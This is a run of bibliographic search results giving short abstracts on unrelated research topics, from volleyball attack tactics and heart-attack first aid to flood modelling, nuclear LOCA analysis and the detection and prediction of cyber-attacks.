    This study examined 142 volleyball games of the Men's Super League 2014/2015 seasons in Brazil from which we analyzed 24-26 games of each participating team, identifying 5,267 Zone 4 attacks for further analysis. Within these Zone 4 attacks, we analyzed the association between the effect of the attack carried out and the separate effects of serve reception, tempo and type of attack. We found that the reception, tempo of attack, second tempo of attack, and power of diagonal attack were predictors of the attack effect in Zone 4. Moreover, placed attacks showed a tendency to not yield a score. In conclusion, winning points in high-level men's volleyball requires excellent receptions, a fast attack tempo and powerfully executed of attacks.

  12. Terrorists and Suicide Attacks

    National Research Council Canada - National Science Library

    Cronin, Audrey K

    2003-01-01

    Suicide attacks by terrorist organizations have become more prevalent globally, and assessing the threat of suicide attacks against the United States and its interests at home and abroad has therefore...

  13. Solidarity under Attack

    DEFF Research Database (Denmark)

    Meret, Susi; Goffredo, Sergio

    2017-01-01

    https://www.opendemocracy.net/can-europe-make-it/susi-meret-sergio-goffredo/solidarity-under-attack......https://www.opendemocracy.net/can-europe-make-it/susi-meret-sergio-goffredo/solidarity-under-attack...

  14. Pericarditis - after heart attack

    Science.gov (United States)

    ... include: A previous heart attack Open heart surgery Chest trauma A heart attack that has affected the thickness of your heart muscle Symptoms Symptoms include: Anxiety Chest pain from the swollen pericardium rubbing on the ...

  15. Heart attack first aid

    Science.gov (United States)

    First aid - heart attack; First aid - cardiopulmonary arrest; First aid - cardiac arrest ... A heart attack occurs when the blood flow that carries oxygen to the heart is blocked. The heart muscle ...

  16. Analysis of Traffic Signals on a Software-Defined Network for Detection and Classification of a Man-in-the-Middle Attack

    Science.gov (United States)

    2017-09-01

    SUPPLEMENTARY NOTES The views expressed in this thesis are those of the author and do not reflect the official policy or position of the Department of...management capabilities of a highly distributed military communications environment. Yet, military adoption of SDN is contingent on a thorough...analysis of security implications. In this thesis, we investigate a man-in-the-middle (MITM) attack that exploits the centralized topological view

  17. Fully Stochastic Distributed Methodology for Multivariate Flood Frequency Analysis

    Directory of Open Access Journals (Sweden)

    Isabel Flores-Montoya

    2016-05-01

    Full Text Available An adequate estimation of the extreme behavior of basin response is essential both for designing river structures and for evaluating their risk. The aim of this paper is to develop a new methodology to generate extreme hydrograph series of thousands of years using an event-based model. To this end, a spatial-temporal synthetic rainfall generator (RainSimV3 is combined with a distributed physically-based rainfall–runoff event-based model (RIBS. The use of an event-based model allows simulating longer hydrograph series with less computational and data requirements but need to characterize the initial basis state, which depends on the initial basin moisture distribution. To overcome this problem, this paper proposed a probabilistic calibration–simulation approach, which considers the initial state and the model parameters as random variables characterized by a probability distribution though a Monte Carlo simulation. This approach is compared with two other approaches, the deterministic and the semi-deterministic approaches. Both approaches use a unique initial state. The deterministic approach also uses a unique value of the model parameters while the semi-deterministic approach obtains these values from its probability distribution through a Monte Carlo simulation, considering the basin variability. This methodology has been applied to the Corbès and Générargues basins, in the Southeast of France. The results show that the probabilistic approach offers the best fit. That means that the proposed methodology can be successfully used to characterize the extreme behavior of the basin considering the basin variability and overcoming the basin initial state problem.

  18. Development and application of a deterministic-realistic hybrid methodology for LOCA licensing analysis

    International Nuclear Information System (INIS)

    Liang, Thomas K.S.; Chou, Ling-Yao; Zhang, Zhongwei; Hsueh, Hsiang-Yu; Lee, Min

    2011-01-01

    Highlights: → A new LOCA licensing methodology (DRHM, deterministic-realistic hybrid methodology) was developed. → DRHM involves conservative Appendix K physical models and statistical treatment of plant status uncertainties. → DRHM can generate 50-100 K PCT margin as compared to a traditional Appendix K methodology. - Abstract: It is well recognized that a realistic LOCA analysis with uncertainty quantification can generate greater safety margin as compared with classical conservative LOCA analysis using Appendix K evaluation models. The associated margin can be more than 200 K. To quantify uncertainty in BELOCA analysis, generally there are two kinds of uncertainties required to be identified and quantified, which involve model uncertainties and plant status uncertainties. Particularly, it will take huge effort to systematically quantify individual model uncertainty of a best estimate LOCA code, such as RELAP5 and TRAC. Instead of applying a full ranged BELOCA methodology to cover both model and plant status uncertainties, a deterministic-realistic hybrid methodology (DRHM) was developed to support LOCA licensing analysis. Regarding the DRHM methodology, Appendix K deterministic evaluation models are adopted to ensure model conservatism, while CSAU methodology is applied to quantify the effect of plant status uncertainty on PCT calculation. Generally, DRHM methodology can generate about 80-100 K margin on PCT as compared to Appendix K bounding state LOCA analysis.

  19. INTEGRATED METHODOLOGY FOR PRODUCT PLANNING USING MULTI CRITERIA ANALYSIS

    Directory of Open Access Journals (Sweden)

    Tarun Soota

    2016-09-01

    Full Text Available Integrated approach to multi-criteria decision problems is proposed using quality function deployment and analytical network process. The objective of the work is to rationalize and improve the method of analyzing and interpreting customer needs and technical requirements. The methodology is used to determine, prioritize engineering requirements based on customer needs for development of best product. Framework allows decision maker to decompose a complex problem in a hierarchical structure to show relationship between objective and criteria. Multi-criteria decision modeling is used for extending the hierarchy process to both dependence and feedback. A case study on bikes is presented for the proposed model.

  20. A methodological comparison of customer service analysis techniques

    Science.gov (United States)

    James Absher; Alan Graefe; Robert Burns

    2003-01-01

    Techniques used to analyze customer service data need to be studied. Two primary analysis protocols, importance-performance analysis (IP) and gap score analysis (GA), are compared in a side-by-side comparison using data from two major customer service research projects. A central concern is what, if any, conclusion might be different due solely to the analysis...

  1. Stream habitat analysis using the instream flow incremental methodology

    Science.gov (United States)

    Bovee, Ken D.; Lamb, Berton L.; Bartholow, John M.; Stalnaker, Clair B.; Taylor, Jonathan; Henriksen, Jim

    1998-01-01

    This document describes the Instream Flow Methodology in its entirety. This also is to serve as a comprehensive introductory textbook on IFIM for training courses as it contains the most complete and comprehensive description of IFIM in existence today. This should also serve as an official guide to IFIM in publication to counteract the misconceptions about the methodology that have pervaded the professional literature since the mid-1980's as this describes IFIM as it is envisioned by its developers. The document is aimed at the decisionmakers of management and allocation of natural resources in providing them an overview; and to those who design and implement studies to inform the decisionmakers. There should be enough background on model concepts, data requirements, calibration techniques, and quality assurance to help the technical user design and implement a cost-effective application of IFIM that will provide policy-relevant information. Some of the chapters deal with basic organization of IFIM, procedural sequence of applying IFIM starting with problem identification, study planning and implementation, and problem resolution.

  2. Using HABIT to Establish the Chemicals Analysis Methodology for Maanshan Nuclear Power Plant

    OpenAIRE

    J. R. Wang; S. W. Chen; Y. Chiang; W. S. Hsu; J. H. Yang; Y. S. Tseng; C. Shih

    2017-01-01

    In this research, the HABIT analysis methodology was established for Maanshan nuclear power plant (NPP). The Final Safety Analysis Report (FSAR), reports, and other data were used in this study. To evaluate the control room habitability under the CO2 storage burst, the HABIT methodology was used to perform this analysis. The HABIT result was below the R.G. 1.78 failure criteria. This indicates that Maanshan NPP habitability can be maintained. Additionally, the sensitivity study of the paramet...

  3. Social Sentiment Sensor in Twitter for Predicting Cyber-Attacks Using ℓ₁ Regularization.

    Science.gov (United States)

    Hernandez-Suarez, Aldo; Sanchez-Perez, Gabriel; Toscano-Medina, Karina; Martinez-Hernandez, Victor; Perez-Meana, Hector; Olivares-Mercado, Jesus; Sanchez, Victor

    2018-04-29

    In recent years, online social media information has been the subject of study in several data science fields due to its impact on users as a communication and expression channel. Data gathered from online platforms such as Twitter has the potential to facilitate research over social phenomena based on sentiment analysis, which usually employs Natural Language Processing and Machine Learning techniques to interpret sentimental tendencies related to users’ opinions and make predictions about real events. Cyber-attacks are not isolated from opinion subjectivity on online social networks. Various security attacks are performed by hacker activists motivated by reactions from polemic social events. In this paper, a methodology for tracking social data that can trigger cyber-attacks is developed. Our main contribution lies in the monthly prediction of tweets with content related to security attacks and the incidents detected based on ℓ 1 regularization.

  4. Social Sentiment Sensor in Twitter for Predicting Cyber-Attacks Using ℓ1 Regularization

    Directory of Open Access Journals (Sweden)

    Aldo Hernandez-Suarez

    2018-04-01

    Full Text Available In recent years, online social media information has been the subject of study in several data science fields due to its impact on users as a communication and expression channel. Data gathered from online platforms such as Twitter has the potential to facilitate research over social phenomena based on sentiment analysis, which usually employs Natural Language Processing and Machine Learning techniques to interpret sentimental tendencies related to users’ opinions and make predictions about real events. Cyber-attacks are not isolated from opinion subjectivity on online social networks. Various security attacks are performed by hacker activists motivated by reactions from polemic social events. In this paper, a methodology for tracking social data that can trigger cyber-attacks is developed. Our main contribution lies in the monthly prediction of tweets with content related to security attacks and the incidents detected based on ℓ 1 regularization.

  5. Social Sentiment Sensor in Twitter for Predicting Cyber-Attacks Using ℓ1 Regularization

    Science.gov (United States)

    Sanchez-Perez, Gabriel; Toscano-Medina, Karina; Martinez-Hernandez, Victor; Olivares-Mercado, Jesus; Sanchez, Victor

    2018-01-01

    In recent years, online social media information has been the subject of study in several data science fields due to its impact on users as a communication and expression channel. Data gathered from online platforms such as Twitter has the potential to facilitate research over social phenomena based on sentiment analysis, which usually employs Natural Language Processing and Machine Learning techniques to interpret sentimental tendencies related to users’ opinions and make predictions about real events. Cyber-attacks are not isolated from opinion subjectivity on online social networks. Various security attacks are performed by hacker activists motivated by reactions from polemic social events. In this paper, a methodology for tracking social data that can trigger cyber-attacks is developed. Our main contribution lies in the monthly prediction of tweets with content related to security attacks and the incidents detected based on ℓ1 regularization. PMID:29710833

  6. Establishing Equivalence: Methodological Progress in Group-Matching Design and Analysis

    Science.gov (United States)

    Kover, Sara T.; Atwood, Amy K.

    2013-01-01

    This methodological review draws attention to the challenges faced by intellectual and developmental disabilities researchers in the appropriate design and analysis of group comparison studies. We provide a brief overview of matching methodologies in the field, emphasizing group-matching designs used in behavioral research on cognition and…

  7. Literature research of FMEA (Failure Mode and Effects Analysis) methodology

    International Nuclear Information System (INIS)

    Hustak, S.

    1999-01-01

    The potential of the FMEA applications is demonstrated. Some approaches can be used for system analysis or immediately for PSA, in particular, for obtaining background information for fault tree analysis in the area of component modelling and, to a lesser extent, for identification of the initiating events. On the other hand, other FMEA applications, such as criticality analysis, are unusable in PSA. (author)

  8. Interaction between core analysis methodology and nuclear design: some PWR examples

    International Nuclear Information System (INIS)

    Rothleder, B.M.; Eich, W.J.

    1982-01-01

    The interaction between core analysis methodology and nuclear design is exemplified by PSEUDAX, a major improvement related to the Advanced Recycle methodology program (ARMP) computer code system, still undergoing development by the Electric Power Research Institute. The mechanism of this interaction is explored by relating several specific nulcear design changes to the demands placed by these changes on the ARMP system, and by examining the meeting of these demands, first within the standard ARMP methodology and then through augmentation of the standard methodology by development of PSEUDAX

  9. Model checking exact cost for attack scenarios

    DEFF Research Database (Denmark)

    Aslanyan, Zaruhi; Nielson, Flemming

    2017-01-01

    Attack trees constitute a powerful tool for modelling security threats. Many security analyses of attack trees can be seamlessly expressed as model checking of Markov Decision Processes obtained from the attack trees, thus reaping the benefits of a coherent framework and a mature tool support....... However, current model checking does not encompass the exact cost analysis of an attack, which is standard for attack trees. Our first contribution is the logic erPCTL with cost-related operators. The extended logic allows to analyse the probability of an event satisfying given cost bounds and to compute...... the exact cost of an event. Our second contribution is the model checking algorithm for erPCTL. Finally, we apply our framework to the analysis of attack trees....

  10. Development of design and analysis methodology for composite bolted joints

    Science.gov (United States)

    Grant, Peter; Sawicki, Adam

    1991-05-01

    This paper summarizes work performed to develop composite joint design methodology for use on rotorcraft primary structure, determine joint characteristics which affect joint bearing and bypass strength, and develop analytical methods for predicting the effects of such characteristics in structural joints. Experimental results have shown that bearing-bypass interaction allowables cannot be defined using a single continuous function due to variance of failure modes for different bearing-bypass ratios. Hole wear effects can be significant at moderate stress levels and should be considered in the development of bearing allowables. A computer program has been developed and has successfully predicted bearing-bypass interaction effects for the (0/+/-45/90) family of laminates using filled hole and unnotched test data.

  11. Análisis del ataque posicional de balonmano playa masculino y femenino mediante coordenadas polares. [Analysis of positional attack in beach handball male and female with polar coordinates].

    Directory of Open Access Journals (Sweden)

    Rafael E. Reigal

    2015-07-01

    Full Text Available La presente investigación tiene como objetivo aportar una perspectiva novedosa en la comprensión y diferenciación de las conductas de juego en la fase de ataque posicional en el balonmano playa masculino y femenino. Para ello se analizaron 28 partidos de alto nivel con el programa informático Hoisan. Se utilizó un diseño Observacional de carácter nomotético, de seguimiento y multidimensional con un sistema taxonómico metodológicamente validado. Los datos fueron sometidos a un análisis de coordenadas polares en su versión genuina. Para llevar a cabo estos análisis se escogieron siete conductas focales relativas, principalmente, a los jugadores que finalizan el ataque y el modo de realizarlo. Los resultados mostraron diferencias entre las conductas de apareo en la categoría masculina y femenina. Destaca que el ataque posicional en la categoría femenina se orienta hacia zonas de finalización izquierdas ante un sistema defensivo abierto y depende más de la jugadora que adquiere el rol de doble portera (especialista que en la categoría masculina, donde las responsabilidades están más repartidas y el ataque se dirige hacia la banda derecha ante un sistema defensivo cerrado. El lanzamiento en giro se ha mostrado como el principal recurso ofensivo en ambas categorías. Abstract This research aims to provide a new perspective on understanding and differentiation of play behavior in the phase of positional attack in the male and female beach handball. 28 high-level games with Hoisan software were analyzed. The observational design used is nomothetic, monitoring and multidimensional. The taxonomic system has been validated methodologically. Data were subjected to analysis of polar coordinates in its genuine version. To carry out these analyzes on seven focal behaviors were chosen mainly for players who complete the attack and how to create it. The results showed differences in mating behavior in the male and female category. Emphasizes

  12. Automated Generation of Attack Trees

    DEFF Research Database (Denmark)

    Vigo, Roberto; Nielson, Flemming; Nielson, Hanne Riis

    2014-01-01

    Attack trees are widely used to represent threat scenarios in a succinct and intuitive manner, suitable for conveying security information to non-experts. The manual construction of such objects relies on the creativity and experience of specialists, and therefore it is error-prone and impractica......Attack trees are widely used to represent threat scenarios in a succinct and intuitive manner, suitable for conveying security information to non-experts. The manual construction of such objects relies on the creativity and experience of specialists, and therefore it is error......-prone and impracticable for large systems. Nonetheless, the automated generation of attack trees has only been explored in connection to computer networks and levering rich models, whose analysis typically leads to an exponential blow-up of the state space. We propose a static analysis approach where attack trees...... are automatically inferred from a process algebraic specification in a syntax-directed fashion, encompassing a great many application domains and avoiding incurring systematically an exponential explosion. Moreover, we show how the standard propositional denotation of an attack tree can be used to phrase...

  13. Cross-site scripting attacks procedure and Prevention Strategies

    Directory of Open Access Journals (Sweden)

    Wang Xijun

    2016-01-01

    Full Text Available Cross-site scripting attacks and defense has been the site of attack and defense is an important issue, this paper, the definition of cross-site scripting attacks, according to the current understanding of the chaos on the cross-site scripting, analyzes the causes and harm cross-site scripting attacks formation of attacks XXS complete process XSS attacks made a comprehensive analysis, and then for the web program includes Mobility there are cross-site scripting filter laxity given from ordinary users browse the web and web application developers two the defense cross-site scripting attacks effective strategy.

  14. Composite Dos Attack Model

    Directory of Open Access Journals (Sweden)

    Simona Ramanauskaitė

    2012-04-01

    Full Text Available Preparation for potential threats is one of the most important phases ensuring system security. It allows evaluating possible losses, changes in the attack process, the effectiveness of used countermeasures, optimal system settings, etc. In cyber-attack cases, executing real experiments can be difficult for many reasons. However, mathematical or programming models can be used instead of conducting experiments in a real environment. This work proposes a composite denial of service attack model that combines bandwidth exhaustion, filtering and memory depletion models for a more real representation of similar cyber-attacks. On the basis of the introduced model, different experiments were done. They showed the main dependencies of the influence of attacker and victim’s properties on the success probability of denial of service attack. In the future, this model can be used for the denial of service attack or countermeasure optimization.

  15. Adapting Job Analysis Methodology to Improve Evaluation Practice

    Science.gov (United States)

    Jenkins, Susan M.; Curtin, Patrick

    2006-01-01

    This article describes how job analysis, a method commonly used in personnel research and organizational psychology, provides a systematic method for documenting program staffing and service delivery that can improve evaluators' knowledge about program operations. Job analysis data can be used to increase evaluators' insight into how staffs…

  16. Methodological Analysis of Gregarious Behaviour of Agents in the Financial Markets

    OpenAIRE

    Solodukhin Stanislav V.

    2013-01-01

    The article considers methodological approaches to analysis of gregarious behaviour of agents in the financial markets and also studies foundations of the agent modelling of decision making processes with consideration of the gregarious instinct.

  17. Montecarlo simulation for a new high resolution elemental analysis methodology

    Energy Technology Data Exchange (ETDEWEB)

    Figueroa S, Rodolfo; Brusa, Daniel; Riveros, Alberto [Universidad de La Frontera, Temuco (Chile). Facultad de Ingenieria y Administracion

    1996-12-31

    Full text. Spectra generated by binary, ternary and multielement matrixes when irradiated by a variable energy photon beam are simulated by means of a Monte Carlo code. Significative jumps in the counting rate are shown when the photon energy is just over the edge associated to each element, because of the emission of characteristic X rays. For a given associated energy, the net height of these jumps depends mainly on the concentration and of the sample absorption coefficient. The spectra were obtained by a monochromatic energy scan considering all the emitted radiation by the sample in a 2{pi} solid angle, associating a single multichannel spectrometer channel to each incident energy (Multichannel Scaling (MCS) mode). The simulated spectra were made with Monte Carlo simulation software adaptation of the package called PENELOPE (Penetration and Energy Loss of Positrons and Electrons in matter). The results show that it is possible to implement a new high resolution spectroscopy methodology, where a synchrotron would be an ideal source, due to the high intensity and ability to control the energy of the incident beam. The high energy resolution would be determined by the monochromating system and not by the detection system and not by the detection system, which would basicalbe a photon counter. (author)

  18. Recent Methodologies for Creep Deformation Analysis and Its Life Prediction

    International Nuclear Information System (INIS)

    Kim, Woo-Gon; Park, Jae-Young; Iung

    2016-01-01

    To design the high-temperature creeping materials, various creep data are needed for codification, as follows: i) stress vs. creep rupture time for base metals and weldments (average and minimum), ii) stress vs. time to 1% total strain (average), iii) stress vs. time to onset of tertiary creep (minimum), and iv) constitutive eqns. for conducting time- and temperature- dependent stress-strain (average), and v) isochronous stress-strain curves (average). Also, elevated temperature components such as those used in modern power generation plant are designed using allowable stress under creep conditions. The allowable stress is usually estimated on the basis of up to 10"5 h creep rupture strength at the operating temperature. The master curve of the “sinh” function was found to have a wider acceptance with good flexibility in the low stress ranges beyond the experimental data. The proposed multi-C method in the LM parameter revealed better life prediction than a single-C method. These improved methodologies can be utilized to accurately predict the long-term creep life or strength of Gen-IV nuclear materials which are designed for life span of 60 years

  19. Montecarlo simulation for a new high resolution elemental analysis methodology

    International Nuclear Information System (INIS)

    Figueroa S, Rodolfo; Brusa, Daniel; Riveros, Alberto

    1996-01-01

    Full text. Spectra generated by binary, ternary and multielement matrixes when irradiated by a variable energy photon beam are simulated by means of a Monte Carlo code. Significative jumps in the counting rate are shown when the photon energy is just over the edge associated to each element, because of the emission of characteristic X rays. For a given associated energy, the net height of these jumps depends mainly on the concentration and of the sample absorption coefficient. The spectra were obtained by a monochromatic energy scan considering all the emitted radiation by the sample in a 2π solid angle, associating a single multichannel spectrometer channel to each incident energy (Multichannel Scaling (MCS) mode). The simulated spectra were made with Monte Carlo simulation software adaptation of the package called PENELOPE (Penetration and Energy Loss of Positrons and Electrons in matter). The results show that it is possible to implement a new high resolution spectroscopy methodology, where a synchrotron would be an ideal source, due to the high intensity and ability to control the energy of the incident beam. The high energy resolution would be determined by the monochromating system and not by the detection system and not by the detection system, which would basicalbe a photon counter. (author)

  20. Eco-efficiency analysis methodology on the example of the chosen polyolefins production

    OpenAIRE

    K. Czaplicka-Kolarz; D. Burchart-Korol; P. Krawczyk

    2010-01-01

    the chosen polyolefins production. The article presents also main tools of eco-efficiency analysis: Life Cycle Assessment (LCA) and Net Present Value (NPV).Design/methodology/approach: On the basis of LCA and NPV of high density polyethylene (HDPE) and low density polyethylene (LDPE) production, eco-efficiency analysis is conducted.Findings: In this article environmental and economic performance of the chosen polyolefins production was presented. The basis phases of eco-efficiency methodology...

  1. Uncertainty and sensitivity analysis methodology in a level-I PSA (Probabilistic Safety Assessment)

    International Nuclear Information System (INIS)

    Nunez McLeod, J.E.; Rivera, S.S.

    1997-01-01

    This work presents a methodology for sensitivity and uncertainty analysis, applicable to a probabilistic safety assessment level I. The work contents are: correct association of distributions to parameters, importance and qualification of expert opinions, generations of samples according to sample sizes, and study of the relationships among system variables and system response. A series of statistical-mathematical techniques are recommended along the development of the analysis methodology, as well different graphical visualization for the control of the study. (author) [es

  2. Go-flow: a reliability analysis methodology applicable to piping system

    International Nuclear Information System (INIS)

    Matsuoka, T.; Kobayashi, M.

    1985-01-01

    Since the completion of the Reactor Safety Study, the use of probabilistic risk assessment technique has been becoming more widespread in the nuclear community. Several analytical methods are used for the reliability analysis of nuclear power plants. The GO methodology is one of these methods. Using the GO methodology, the authors performed a reliability analysis of the emergency decay heat removal system of the nuclear ship Mutsu, in order to examine its applicability to piping systems. By this analysis, the authors have found out some disadvantages of the GO methodology. In the GO methodology, the signal is on-to-off or off-to-on signal, therefore the GO finds out the time point at which the state of a system changes, and can not treat a system which state changes as off-on-off. Several computer runs are required to obtain the time dependent failure probability of a system. In order to overcome these disadvantages, the authors propose a new analytical methodology: GO-FLOW. In GO-FLOW, the modeling method (chart) and the calculation procedure are similar to those in the GO methodology, but the meaning of signal and time point, and the definitions of operators are essentially different. In the paper, the GO-FLOW methodology is explained and two examples of the analysis by GO-FLOW are given

  3. Toward a computer-aided methodology for discourse analysis ...

    African Journals Online (AJOL)

    aided methods to discourse analysis”. This project aims to develop an e-learning environment dedicated to documenting, evaluating and teaching the use of corpus linguistic tools suitable for interpretative text analysis. Even though its roots are in ...

  4. Proteome analysis of Saccharomyces cerevisiae: a methodological outline

    DEFF Research Database (Denmark)

    Fey, S J; Nawrocki, A; Görg, A

    1997-01-01

    Proteome analysis offers a unique means of identifying important proteins, characterizing their modifications and beginning to describe their function. This is achieved through the combination of two technologies: protein separation and selection by two-dimensional gel electrophoresis, and protei...

  5. Theoretical and methodological analysis of personality theories of leadership

    OpenAIRE

    Оксана Григорівна Гуменюк

    2016-01-01

    The psychological analysis of personality theories of leadership, which is the basis for other conceptual approaches to understanding the nature of leadership, is conducted. Conceptual approach of leadership is analyzed taking into account the priority of personality theories, including: heroic, psychoanalytic, «trait» theory, charismatic and five-factor. It is noted that the psychological analysis of personality theories are important in understanding the nature of leadership

  6. Methodology Series Module 6: Systematic Reviews and Meta-analysis.

    Science.gov (United States)

    Setia, Maninder Singh

    2016-01-01

    Systematic reviews and meta-analysis have become an important of biomedical literature, and they provide the "highest level of evidence" for various clinical questions. There are a lot of studies - sometimes with contradictory conclusions - on a particular topic in literature. Hence, as a clinician, which results will you believe? What will you tell your patient? Which drug is better? A systematic review or a meta-analysis may help us answer these questions. In addition, it may also help us understand the quality of the articles in literature or the type of studies that have been conducted and published (example, randomized trials or observational studies). The first step it to identify a research question for systematic review or meta-analysis. The next step is to identify the articles that will be included in the study. This will be done by searching various databases; it is important that the researcher should search for articles in more than one database. It will also be useful to form a group of researchers and statisticians that have expertise in conducting systematic reviews and meta-analysis before initiating them. We strongly encourage the readers to register their proposed review/meta-analysis with PROSPERO. Finally, these studies should be reported according to the Preferred Reporting Items for Systematic Reviews and Meta-analysis checklist.

  7. Phoenix – A model-based Human Reliability Analysis methodology: Qualitative Analysis Procedure

    International Nuclear Information System (INIS)

    Ekanem, Nsimah J.; Mosleh, Ali; Shen, Song-Hua

    2016-01-01

    Phoenix method is an attempt to address various issues in the field of Human Reliability Analysis (HRA). Built on a cognitive human response model, Phoenix incorporates strong elements of current HRA good practices, leverages lessons learned from empirical studies, and takes advantage of the best features of existing and emerging HRA methods. Its original framework was introduced in previous publications. This paper reports on the completed methodology, summarizing the steps and techniques of its qualitative analysis phase. The methodology introduces the “Crew Response Tree” which provides a structure for capturing the context associated with Human Failure Events (HFEs), including errors of omission and commission. It also uses a team-centered version of the Information, Decision and Action cognitive model and “macro-cognitive” abstractions of crew behavior, as well as relevant findings from cognitive psychology literature and operating experience, to identify potential causes of failures and influencing factors during procedure-driven and knowledge-supported crew-plant interactions. The result is the set of identified HFEs and likely scenarios leading to each. The methodology itself is generic in the sense that it is compatible with various quantification methods, and can be adapted for use across different environments including nuclear, oil and gas, aerospace, aviation, and healthcare. - Highlights: • Produces a detailed, consistent, traceable, reproducible and properly documented HRA. • Uses “Crew Response Tree” to capture context associated with Human Failure Events. • Models dependencies between Human Failure Events and influencing factors. • Provides a human performance model for relating context to performance. • Provides a framework for relating Crew Failure Modes to its influencing factors.

  8. Methodology for risk-based analysis of technical specifications

    International Nuclear Information System (INIS)

    Vesely, W.E.; Gaertner, J.P.; Wagner, D.P.

    1985-01-01

    Part of the effort by EPRI to apply probabilistic risk assessment methods and results to the solution of utility problems involves the investigation of methods for risk-based analysis of technical specifications. The culmination of this investigation is the SOCRATES computer code developed by Battelle's Columbus Laboratories to assist in the evaluation of technical specifications of nuclear power plants. The program is designed to use information found in PRAs to re-evaluate risk for changes in component allowed outage times (AOTs) and surveillance test intervals (STIs). The SOCRATES program is a unique and important tool for technical specification evaluations. The detailed component unavailability model allows a detailed analysis of AOT and STI contributions to risk. Explicit equations allow fast and inexpensive calculations. Because the code is designed to accept ranges of parameters and to save results of calculations that do not change during the analysis, sensitivity studies are efficiently performed and results are clearly displayed

  9. Uncertainty analysis on probabilistic fracture mechanics assessment methodology

    International Nuclear Information System (INIS)

    Rastogi, Rohit; Vinod, Gopika; Chandra, Vikas; Bhasin, Vivek; Babar, A.K.; Rao, V.V.S.S.; Vaze, K.K.; Kushwaha, H.S.; Venkat-Raj, V.

    1999-01-01

    Fracture Mechanics has found a profound usage in the area of design of components and assessing fitness for purpose/residual life estimation of an operating component. Since defect size and material properties are statistically distributed, various probabilistic approaches have been employed for the computation of fracture probability. Monte Carlo Simulation is one such procedure towards the analysis of fracture probability. This paper deals with uncertainty analysis using the Monte Carlo Simulation methods. These methods were developed based on the R6 failure assessment procedure, which has been widely used in analysing the integrity of structures. The application of this method is illustrated with a case study. (author)

  10. Full cost accounting in the analysis of separated waste collection efficiency: A methodological proposal.

    Science.gov (United States)

    D'Onza, Giuseppe; Greco, Giulio; Allegrini, Marco

    2016-02-01

    Recycling implies additional costs for separated municipal solid waste (MSW) collection. The aim of the present study is to propose and implement a management tool - the full cost accounting (FCA) method - to calculate the full collection costs of different types of waste. Our analysis aims for a better understanding of the difficulties of putting FCA into practice in the MSW sector. We propose a FCA methodology that uses standard cost and actual quantities to calculate the collection costs of separate and undifferentiated waste. Our methodology allows cost efficiency analysis and benchmarking, overcoming problems related to firm-specific accounting choices, earnings management policies and purchase policies. Our methodology allows benchmarking and variance analysis that can be used to identify the causes of off-standards performance and guide managers to deploy resources more efficiently. Our methodology can be implemented by companies lacking a sophisticated management accounting system. Copyright © 2015 Elsevier Ltd. All rights reserved.

  11. Analysis of market competitive structure: The new methodological approach based in the using

    International Nuclear Information System (INIS)

    Romero de la Fuente, J.; Yague Guillen, M. J.

    2007-01-01

    This paper proposes a new methodological approach to identify market competitive structure, applying usage situation concept in positioning analysis. Dimensions used by consumer to classify products are identified using Correspondence Analysis and competitive groups are formed. Results are validated with Discriminant Analysis. (Author) 23 refs

  12. BWR stability analysis: methodology of the stability analysis and results of PSI for the NEA/NCR benchmark task

    International Nuclear Information System (INIS)

    Hennig, D.; Nechvatal, L.

    1996-09-01

    The report describes the PSI stability analysis methodology and the validation of this methodology based on the international OECD/NEA BWR stability benchmark task. In the frame of this work, the stability properties of some operation points of the NPP Ringhals 1 have been analysed and compared with the experimental results. (author) figs., tabs., 45 refs

  13. Physical data generation methodology for return-to-power steam line break analysis

    Energy Technology Data Exchange (ETDEWEB)

    Zee, Sung Kyun; Lee, Chung Chan; Lee, Chang Kue [Korea Atomic Energy Research Institute, Taejon (Korea, Republic of)

    1996-02-01

    Current methodology to generate physics data for steamline break accident analysis of CE-type nuclear plant such as Yonggwang Unit 3 is valid only if the core reactivity does not reach the criticality after shutdown. Therefore, the methodology requires tremendous amount of net scram worth, specially at the end of the cycle when moderator temperature coefficient is most negative. Therefore, we need a new methodology to obtain reasonably conservation physics data, when the reactor returns to power condition. Current methodology used ROCS which include only closed channel model. But it is well known that the closed channel model estimates the core reactivity too much negative if core flow rate is low. Therefore, a conservative methodology is presented which utilizes open channel 3D HERMITE model. Current methodology uses ROCS which include only closed channel model. But it is well known that the closed channel model estimates the core reactivity too much negative if core flow rate is low. Therefore, a conservative methodology is presented which utilizes open channel 3D HERMITE model. Return-to-power reactivity credit is produced to assist the reactivity table generated by closed channel model. Other data includes hot channel axial power shape, peaking factor and maximum quality for DNBR analysis. It also includes pin census for radiological consequence analysis. 48 figs., 22 tabs., 18 refs. (Author) .new.

  14. SAFETY ANALYSIS METHODOLOGY FOR AGED CANDU® 6 NUCLEAR REACTORS

    Directory of Open Access Journals (Sweden)

    WOLFGANG HARTMANN

    2013-10-01

    Full Text Available This paper deals with the Safety Analysis for CANDU® 6 nuclear reactors as affected by main Heat Transport System (HTS aging. Operational and aging related changes of the HTS throughout its lifetime may lead to restrictions in certain safety system settings and hence some restriction in performance under certain conditions. A step in confirming safe reactor operation is the tracking of relevant data and their corresponding interpretation by the use of appropriate thermalhydraulic analytic models. Safety analyses ranging from the assessment of safety limits associated with the prevention of intermittent fuel sheath dryout for a slow Loss of Regulation (LOR analysis and fission gas release after a fuel failure are summarized. Specifically for fission gas release, the thermalhydraulic analysis for a fresh core and an 11 Effective Full Power Years (EFPY aged core was summarized, leading to the most severe stagnation break sizes for the inlet feeder break and the channel failure time. Associated coolant conditions provide the input data for fuel analyses. Based on the thermalhydraulic data, the fission product inventory under normal operating conditions may be calculated for both fresh and aged cores, and the fission gas release may be evaluated during the transient. This analysis plays a major role in determining possible radiation doses to the public after postulated accidents have occurred.

  15. Methodological aspects in the analysis of spontaneously produced sputum

    NARCIS (Netherlands)

    Out, T. A.; Jansen, H. M.; Lutter, R.

    2001-01-01

    Analysis of sputum as a specimen containing inflammatory indices has gained considerable interest during the last decade with focus on chronic bronchitis (CB) with or without airway obstruction, cystic fibrosis (CF), chronic obstructive pulmonary disease (COPD) and asthma. The nature of the

  16. Recent methodology in the phytochemical analysis of ginseng

    NARCIS (Netherlands)

    Angelova, N.; Kong, H.-W.; Heijden, R. van de; Yang, S.-Y.; Choi, Y.H.; Kim, H.K.; Wang, M.; Hankemeier, T.; Greef, J. van der; Xu, G.; Verpoorte, R.

    2008-01-01

    This review summarises the most recent developments in ginseng analysis, in particular the novel approaches in sample pre-treatment and the use of high-performance liquid-chromatography-mass spectrometry. The review also presents novel data on analysing ginseng extracts by nuclear magnetic resonance

  17. Important Literature in Endocrinology: Citation Analysis and Historial Methodology.

    Science.gov (United States)

    Hurt, C. D.

    1982-01-01

